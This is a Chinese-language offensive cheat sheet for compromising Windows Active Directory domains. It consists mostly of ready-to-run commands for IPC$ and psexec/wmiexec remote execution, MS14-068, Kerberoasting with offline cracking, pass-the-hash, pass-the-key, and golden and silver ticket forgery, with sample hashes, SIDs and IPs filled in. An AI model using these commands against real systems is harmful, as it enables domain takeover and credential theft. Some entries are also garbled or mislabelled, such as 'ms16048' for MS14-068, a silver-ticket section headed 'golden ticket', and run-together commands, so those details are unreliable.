IPC

IPC$入侵

• 建立非空连接
• 新建批处理
• Copy命令上传
• 查看目标靶机时间
• 通过at命令在特定时间执行批处理文件
• 在目标靶机上查看

其他命令

• 将目标共享建立一个映射g盘 netuseg:\\192.168.3.68\c$
• 查看已建立的会话

通过工具进行会话连接执行

psexec.exe  \\192.168.1.108   cmd  -uadministrator   -p  123456

csript.exe  wmiexec.vbs   /shell   192.168.1.108   administrator   123456

返回一个cmd交互界面执行即可

MS14068

• 首先尝试访问域控共享文件夹 拒绝访问
• 使用ms16048

-u域账号+@+域名称 -p为当前用户的密码，即ts1的密码 -s为ts1的SID值，可以通过whoami/all来获取用户的SID值-d为当前域的域控

• 生成ccache文件
• 删除当前缓存的kerboeos票据 kerberos::purge
• 导入ccache文件 kerberos::ptc
• 再次访问域控共享文件

Kerberoating

早期kerberoating

工具 Kerberoast工具包 Mimikatz

• 使用Kerberoast工具包GetUserPNs.ps1进行SPN扫描

• 根据微软提供的类KerberosRequeststorSecurityToken发起Kerberos请求申请票据 Add-Type-AssemblyNameSystem.IdentityModel New-ObjectSystem.IdentityModel.Tokens.KerberosRequestorSecurityToken-ArgumentList"MSSQLSvc/SRC_DB_ODAY.org:1433"
• 通过klist命令查看当前会话存储的Kerberos票据 klist
• 使用mimikatz导出 kerberos::list/export
• 使用kerberoast 工具集中的 tgsrepcrack.py 工具进行离线爆破 python tgsrepcrack.py list1.txt2-40a00000-jack@MSSQLSvc~Srv-DB-0day.0day.org~1433-0DAY.ORG.kirbi

kerberoating新姿势

工具 Invoke-Kerberoast.ps1 HashCat

• 转为Hashcat格式 Invoke-kerberoast–outputformat hashcat|fl
• 保存 nvoke-Kerberoast-OutputformatHashcat|fl>test1.txt
• Hashcat爆破 hashcat64.exe–m13100test1.txt password.list--force

Pth

Pass the hash

• 使用mimikatz先获取hash

privilege::debug

sekurlsa::logonpasswords

• 攻击机执行

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:SRV-DB-0DAY /ntlm:ac307fdeab3e8307c3892c163a7808d5"

• 验证pth

wmiexec

• Invoke-SMBExec

https://github.com/Kevin-Robertson/Invoke-TheHashInvoke-WMIExec -Target 192.168.3.21 -Domain workgroup -Username administrator -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

• Invoke-SMBExec

Invoke-SMBExec -Target 192.168.3.21 -Domain test.local -Username test1 -Hash ccef208c6485269c20db2cad21734fe7 -Command "calc.exe" -verbose

如果只有SMB文件共享的权限，没有远程执行权限，可以使用该脚本

• wmiexec.py

https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.pyhttps://github.com/maaaaz/impacket-examples-windows

wmiexec -hashes 00000000000000000000000000000000:ccef208c6485269c20db2cad21734fe7 workgroup/administrator@192.168.3.21 "whoami"

普通用户可用

CrackMapExec

https://github.com/byt3bl33d3r/CrackMapExec.git

crackmapexec 192.168.3.0/24 -u administrator -H ccef208c6485269c20db2cad21734fe7

Ptk

对于8.1/2012r2，安装补丁kb2871997的Win 7/2008r2/8/2012，可以使用AES keys代替NT hash

• 获取用户的aes key

mimikatz "privilege::debug" "sekurlsa::ekeys"

• 注入aes key

mimikatz "privilege::debug" "sekurlsa::pth /user:sqlsvr /domain:0DAY.ORG /aes256:bf2cab4e27a426c9ec9d21c919f119843415ee5d98587063d6e48d16633c5436" 

Ptt

Golden ticket(黄金票据)

前提： 域名称 域SID krbtgt账户密码 伪造用户名

• dump krbtgt hash

privilege::debuglsadump::lsa /patch

• 生成ticket

kerberos::golden  /admin:administrator  /domain:0day.org /sid: S-1-5-21-1812960810-2335050734-3517558805 /krbtgt:36f9d9e6d98ecf8307baf4f46ef842a2  /ticket:test.kiribi

• 注入凭据

kerberos::ptt test.kirbi

• 验证Golden ticket

golden ticket（白银票据）

前提： 域名称 域SID 域的服务账户的密码hash 伪造用户名

• dump server hash

privilege::debugsekurlsa::logonpasswords

• 导入凭证

kerberos::golden /domain:0day.org /sid:S-1-5-21-1812960810-2335050734-3517558805 /target:192.168.3.142 /rc4:74cca677f85c7c566352fd846eb0d82a  /service:cifs /user:syst1m /ptt

• 验证

Tips

mimikatz复制粘贴困难，可使用如>>log.txt

exploit/windows/smb/psexec 使用hash传递

post/windows/gather/smart_hashdump 读取hash

.domain_list_gen 获取域管理账户列表

auxiliary/gather/kerberos_enumusers 用户名枚举

auxiliary/admin/kerberos/ms14_068_kerberos_checksum 14068

load kiwikerberos_ticket_use /tmp/0-00000000-juan@krbtgt-DEMO.LOCAL.kirbi kiwi扩展来导入TGT票证参考：https://blog.rapid7.com/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit/

• Mimikatz

load mimikatz 加载mimikatz_command -f version  版本mimikatz_command -f fu 获取可用模块列表msv 检索msv凭证wdigest 读取密码kerberos 尝试检索kerberos凭据

看到了再加～